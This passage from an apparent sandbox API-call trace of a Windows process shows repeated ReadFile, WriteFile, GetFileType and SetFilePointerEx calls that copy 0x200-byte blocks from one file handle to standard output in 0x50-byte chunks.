nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.844] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType 
(hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.845] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.845] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0149.845] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, 
lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.846] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.846] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] GetFileType (hFile=0x50) returned 0x1 [0149.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.847] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] GetFileType (hFile=0x50) returned 0x1 [0149.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.848] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, 
lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 
| out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] GetFileType (hFile=0x50) returned 0x1 [0149.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.849] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.849] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.850] GetFileType (hFile=0x50) returned 0x1 [0149.850] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.850] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.850] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] GetFileType (hFile=0x50) returned 0x1 [0149.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.851] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 
